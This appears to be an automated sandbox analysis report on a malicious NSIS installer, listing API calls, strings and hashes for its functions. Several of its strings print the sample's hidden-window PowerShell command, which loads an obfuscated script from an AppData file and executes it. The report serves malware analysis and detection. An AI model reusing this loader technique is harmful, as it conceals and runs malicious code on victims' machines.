String ID: "$"C:\Users\user\Desktop\hnTW5HdWvY.exe"$"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs$C:\Users\user\Desktop$C:\Users\user\Desktop\hnTW5HdWvY.exe$Error launching installer$Low$NSIS Error$Profiling Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-2073649725
Opcode ID: 0d7fa00730437da9ddf290d822faeb6c7a1a34a91ab4856d0ef7111e7c2b87d8
Instruction ID: 928bf8b7717c50f7cf81e46c7c3b8c2b1ab21f80cc33b5d8a4cab443c6c74aa6
Opcode Fuzzy Hash: 0d7fa00730437da9ddf290d822faeb6c7a1a34a91ab4856d0ef7111e7c2b87d8
Instruction Fuzzy Hash: D0B106705083816EE7216F745C8DA2F3EA8AB86306F04057EF581B61E2C77C9A058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404FA3 Relevance: 54.3, APIs: 36, Instructions: 280
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405003
GetDlgItem.USER32(?,000003EE), ref: 00405012
GetClientRect.USER32(?,?), ref: 0040504F
GetSystemMetrics.USER32(00000015), ref: 00405057
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405078
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405089
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040509C
SendMessageA.USER32(?,00001026,00000000,?), ref: 004050AA
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050BD
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050DF
ShowWindow.USER32(?,00000008), ref: 004050F3
GetDlgItem.USER32(?,000003EC), ref: 00405114
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405124
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040513D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405149
GetDlgItem.USER32(?,000003F8), ref: 00405021

Part of subcall function 00403E9D: SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB

GetDlgItem.USER32(?,000003EC), ref: 00405165
CreateThread.KERNELBASE(00000000,00000000,Function_00004F37,00000000), ref: 00405173
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040517A
ShowWindow.USER32(00000000), ref: 0040519D
ShowWindow.USER32(?,00000008), ref: 004051A4
ShowWindow.USER32(00000008), ref: 004051EA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040521E
CreatePopupMenu.USER32 ref: 0040522F
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405244
GetWindowRect.USER32(?,000000FF), ref: 00405264
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040527D
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052B9
OpenClipboard.USER32(00000000), ref: 004052C9
EmptyClipboard.USER32 ref: 004052CF
GlobalAlloc.KERNEL32(00000042,?), ref: 004052D8
GlobalLock.KERNEL32(00000000), ref: 004052E2
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F6
GlobalUnlock.KERNEL32(00000000), ref: 0040530F
SetClipboardData.USER32(00000001,00000000), ref: 0040531A
CloseClipboard.USER32 ref: 00405320

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID:
API String ID: 4154960007-0
Opcode ID: 368293ae39bef55916d87790870d27055f7ea109493cf3f148aba3dc50e3ddc3
Instruction ID: d5812118e63f16fa5c19f57adc5cd4d6a9be73a85bc34068d170a9efe70f60b8
Opcode Fuzzy Hash: 368293ae39bef55916d87790870d27055f7ea109493cf3f148aba3dc50e3ddc3
Instruction Fuzzy Hash: 84A16B70900208FFEB119FA4DD89AAE7F79FB48344F00416AFA01B61A0C7795E50DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,00404E9D,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000), ref: 00405C4D
GetSystemDirectoryA.KERNEL32(Exec,00000400), ref: 00405CC8
GetWindowsDirectoryA.KERNEL32(Exec,00000400), ref: 00405CDB
SHGetSpecialFolderLocation.SHELL32(?,0078EAA8), ref: 00405D17
SHGetPathFromIDListA.SHELL32(0078EAA8,Exec), ref: 00405D25
CoTaskMemFree.OLE32(0078EAA8), ref: 00405D30
lstrcatA.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D52
lstrlenA.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,00404E9D,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000), ref: 00405DA4

Strings

"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 00405D7C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D4C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C97
Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll, xrefs: 00405BCB
Exec, xrefs: 00405BC3, 00405C95, 00405CB2, 00405CC7, 00405CDA, 00405CF6, 00405D21, 00405D51, 00405D57, 00405D6F, 00405D82, 00405D9D, 00405DA3, 00405DAE, 00405DD8

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$Exec$Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-383215854
Opcode ID: 9e5fa4849c676bd36283baea63b88551cad492c77ebc301685f8ff802d5d5524
Instruction ID: 9e84d75f846cee838fb64c09e4141d624f321ac221b592bdbe658a79732caf68
Opcode Fuzzy Hash: 9e5fa4849c676bd36283baea63b88551cad492c77ebc301685f8ff802d5d5524
Instruction Fuzzy Hash: EE61EF71A04A05AFEB106B648C88BBF3BA5EF56314F14813BE541BA2D1D33C5981DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040543A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 00405463
lstrcatA.KERNEL32(pivot\drukmaases.kin,\*.*,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054AB
lstrcatA.KERNEL32(?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054CC
lstrlenA.KERNEL32(?,?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054D2
FindFirstFileA.KERNELBASE(pivot\drukmaases.kin,?,?,?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054E3
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405590
FindClose.KERNEL32(00000000), ref: 004055A1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405448
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 0040543A
\*.*, xrefs: 004054A5
pivot\drukmaases.kin, xrefs: 00405493, 00405499, 004054AA, 004054E0

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pivot\drukmaases.kin
API String ID: 2035342205-1775042556
Opcode ID: 674cc7c14af956293775df5d969b14a71ceab8ff2b31b4e5d899a70ce42ae62b
Instruction ID: 8ee730f1ebc31b0169d0384be9803177be11285333fd16537a0ab87d7e7bd3ec
Opcode Fuzzy Hash: 674cc7c14af956293775df5d969b14a71ceab8ff2b31b4e5d899a70ce42ae62b
Instruction Fuzzy Hash: 2D51D030900A04BADB216B65CC45BBF7A79DB82755F14817BF844B12D2D33C9A82DFAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208C
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402145

Strings

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 004020C6

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
API String ID: 123533781-2505418928
Opcode ID: 4ba3537fe497458feca8795abc7d6864e8c346593bf1e1b685935b2849559c10
Instruction ID: 5157e5bb901614104f2663cb9119d9abf172b2b834e28e211f1a5824c3cc141a
Opcode Fuzzy Hash: 4ba3537fe497458feca8795abc7d6864e8c346593bf1e1b685935b2849559c10
Instruction Fuzzy Hash: 90416AB5A00205BFCB00DFA4CD88E9D7BB6AF88314F204169F905FB2E5CA79D941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,0079FD48,pivot\drukmaases.kin,0040573B,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 00405E89
FindClose.KERNEL32(00000000), ref: 00405E95

Strings

pivot\drukmaases.kin, xrefs: 00405E7E

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: pivot\drukmaases.kin
API String ID: 2295610775-360973136
Opcode ID: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
Instruction ID: fa6d82a82db092ae67cc5cf3184883c37463242b015de973cf80f9822f081d1d
Opcode Fuzzy Hash: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
Instruction Fuzzy Hash: D7D012319095205BC7015738AC0C84B7A58DF553717104A32F4A9F52E0C3789D629AE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405EA5 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction ID: 6203a20b8c6d2c7dd9bc8fde92c4464bacb2d6670710d6b04c7398c309678aab
Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction Fuzzy Hash: 25E0C232A04611ABC710AB34DC08A6B77B8EF88651304893EF555F6151D734EC11ABFA

Uniqueness

Uniqueness Score: -1.00%

Function 00402647 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402656

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 324f6059646226e638cebd62381d6f71d9e34c43330c4a77c7f3c5d649a2b334
Instruction ID: 9954a9e90a4ff8e1476aca16375cd89b929f17a4c0bf373ce54cb0035b2a7fc8
Opcode Fuzzy Hash: 324f6059646226e638cebd62381d6f71d9e34c43330c4a77c7f3c5d649a2b334
Instruction Fuzzy Hash: 4AF0A0725041509AD700E7A49D49AFEB368DB12324F2046BBE101B20C1D2B85942AB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403995 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039D1
ShowWindow.USER32(?), ref: 004039EE
DestroyWindow.USER32 ref: 00403A02
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A1E
GetDlgItem.USER32(?,?), ref: 00403A3F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A53
IsWindowEnabled.USER32(00000000), ref: 00403A5A
GetDlgItem.USER32(?,00000001), ref: 00403B08
GetDlgItem.USER32(?,00000002), ref: 00403B12
SetClassLongA.USER32(?,000000F2,?), ref: 00403B2C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B7D
GetDlgItem.USER32(?,00000003), ref: 00403C23
ShowWindow.USER32(00000000,?), ref: 00403C44
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C56
EnableWindow.USER32(?,?), ref: 00403C71
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C87
EnableMenuItem.USER32(00000000), ref: 00403C8E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CA6
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CB9
lstrlenA.KERNEL32(0079E4F8,?,0079E4F8,Profiling Setup), ref: 00403CE2
SetWindowTextA.USER32(?,0079E4F8), ref: 00403CF1
ShowWindow.USER32(?,0000000A), ref: 00403E25

Strings

Profiling Setup, xrefs: 00403CD3

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
